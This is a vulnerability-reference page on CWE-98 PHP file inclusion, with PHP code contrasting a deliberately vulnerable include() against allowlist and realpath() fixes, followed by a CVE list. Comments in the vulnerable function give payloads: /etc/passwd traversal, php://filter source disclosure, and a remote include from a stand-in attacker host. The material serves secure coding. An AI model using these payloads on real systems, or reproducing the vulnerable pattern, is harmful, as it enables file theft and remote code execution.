CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')

Exploit likelihood: High

Parent: CWE-706 - Use of Incorrectly-Resolved Name or Reference

The PHP application receives input from an upstream component, but it does not restrict, or incorrectly restricts, that input before using it as the filename in "require", "include", or similar functions (include_once, require_once). Despite the name, the weakness covers both remote inclusion (a URL or data: wrapper pulled in over the network, only possible when allow_url_include is enabled) and local file inclusion (traversal to an existing file on the server, or a php://filter wrapper that discloses source), which is why most of the entries below are labelled LFI.
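The following is an added illustration, not code from the CWE entry or from any of the products listed below. It shows the weakness in its simplest form next to two ways of removing it. The `templates/` directory, the page names and the `page` parameter are invented for the example.

```php
<?php
declare(strict_types=1);

// VULNERABLE (CWE-98): the request parameter is used verbatim as the include path.
// Payloads that work against this, depending on configuration:
//   ?page=../../../../etc/passwd                          local file read
//   ?page=php://filter/convert.base64-encode/resource=config.php
//                                                          source disclosure
//   ?page=http://attacker.example/x.txt                    RCE, only if allow_url_include=On
function render_vulnerable(string $page): void
{
    include $page;
}

// HARDENED, option 1: treat the parameter as a lookup key, never as a path.
// Only these three literal paths can ever reach include().
const TEMPLATES = [
    'home'    => __DIR__ . '/templates/home.php',
    'about'   => __DIR__ . '/templates/about.php',
    'contact' => __DIR__ . '/templates/contact.php',
];

function render_allowlisted(string $page): void
{
    if (!array_key_exists($page, TEMPLATES)) {
        http_response_code(404);
        return;
    }
    include TEMPLATES[$page];
}

// HARDENED, option 2 (open-ended set of templates): restrict the character set,
// then resolve the real path and confirm it stays inside the template root.
// Returns the resolved path, or null if the request must be rejected.
function resolve_template(string $page, string $root): ?string
{
    // Letters, digits, '-' and '_' only: no '.', '/', '\', ':' or NUL,
    // so neither traversal nor stream wrappers can be expressed.
    if (preg_match('/\A[a-z0-9_-]{1,64}\z/', $page) !== 1) {
        return null;
    }
    $rootReal  = realpath($root);
    $candidate = realpath($root . DIRECTORY_SEPARATOR . $page . '.php');
    if ($rootReal === false || $candidate === false) {
        return null; // template root or file does not exist
    }
    // realpath() follows symlinks, so a symlink pointing outside $root fails here.
    $prefix = $rootReal . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

function render_confined(string $page): void
{
    $path = resolve_template($page, __DIR__ . '/templates');
    if ($path === null) {
        http_response_code(404);
        return;
    }
    include $path;
}

$requested = $_GET['page'] ?? 'home';
render_allowlisted(is_string($requested) ? $requested : 'home');
```

Two points worth checking when triaging a report against this weakness. First, `allow_url_include` has defaulted to Off since PHP 5.2, so a finding that needs a remote URL is a local-file-inclusion bug on most deployments unless the operator turned it on; the impact then depends on what the attacker can already write to disk (uploads, session files, logs). Second, sanitising by stripping `../` is not equivalent to the allowlist or the `realpath()` check above: the stripped string can be rebuilt (`....//`), and the php:// and data: wrappers contain no dot segments at all.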

1,228 vulnerabilities with CWE-98
CVE-2023-25995 HIGH
choicehomemortgage AI Mortgage Calculator <1.0.1 - Code Injection
CVSS 7.5
CVE-2023-49031 MEDIUM
Tikit eMarketing <6.8.3.0 - Path Traversal
CVSS 5.1
CVE-2023-6989 CRITICAL
Shield Security < 18.5.10 - Unauthenticated Local File Inclusion via render_action_template Parameter
CVSS 9.8
CVE-2023-52325 HIGH
Trend Micro Apex Central - Authenticated Local File Inclusion
CVSS 7.5
CVE-2023-6583 MEDIUM
Import and export users and customers <= 1.24.2 - Path Traversal and Arbitrary File Read/Delete
CVSS 6.6
CVE-2023-49084 HIGH
Cacti RCE via SQLi in pollers.php
CVSS 8.0
CVE-2023-5815 HIGH
News & Blog Designer Pack < 3.4.1 - Unauthenticated Remote Code Execution via Local File Inclusion in bdp_get_more_post
CVSS 8.1
CVE-2023-5099 HIGH
WordPress <=2.7 - Local File Inclusion
CVSS 8.8
CVE-2023-5250 HIGH
Grid Plus <1.3.2 - Local File Inclusion
CVSS 8.8
CVE-2023-5199 CRITICAL
PHP to Page < 0.3 - Authenticated Local File Inclusion to Remote Code Execution via Shortcode
CVSS 9.9
CVE-2023-4488 CRITICAL
Dropbox Folder Share for WordPress <=1.9.7 - Local File Inclusion
CVSS 9.8
CVE-2023-31718 HIGH
FUXA <= 1.1.12 - Local File Inclusion via /api/download
CVSS 7.5
CVE-2023-31716 HIGH
FUXA <= 1.1.12 - Local File Inclusion
CVSS 7.5
CVE-2023-23565 MEDIUM
Geomatika IsiGeo Web 6.0 - Authenticated Local File Inclusion
CVSS 4.9
CVE-2023-3452 CRITICAL
Canto plugin for WordPress <=3.0.4 - RCE
CVSS 9.8
CVE-2023-4195 HIGH
Cockpit < 2.6.3 - PHP Remote File Inclusion
CVSS 8.8
CVE-2023-2249 HIGH
wpForo Forum < 2.1.7 - Authenticated Local File Include and Server-Side Request Forgery via file_get_contents
CVSS 8.8
CVE-2023-2551 HIGH
bumsys < 2.1.1 - Remote File Inclusion
CVSS 8.8
CVE-2023-24217 HIGH
AgileBio Electronic Lab Notebook <4.234 - Local File Inclusion
CVSS 8.8
CVE-2022-50954 MEDIUM
WordPress Plugin cab-fare-calculator 1.0.3 Local File Inclusion
CVSS 6.2
CVE-2022-50897 MEDIUM
mPDF 7.0 - Local File Inclusion via Annotation File Parameters
CVSS 5.5
CVE-2022-4982 HIGH
DBLTek GoIP-1 <GHSFVT-1.1-67-5 - Local File Inclusion
CVE-2022-4606 CRITICAL
GitHub flatpressblog/flatpress <1.3 - RCE
CVSS 9.8
CVE-2022-4446 CRITICAL
corebos < 8.0 - Remote File Inclusion
CVSS 9.8
CVE-2022-44786 HIGH
Appalti & Contratti 9.12.2 - Local File Inclusion via href Parameter
CVSS 7.5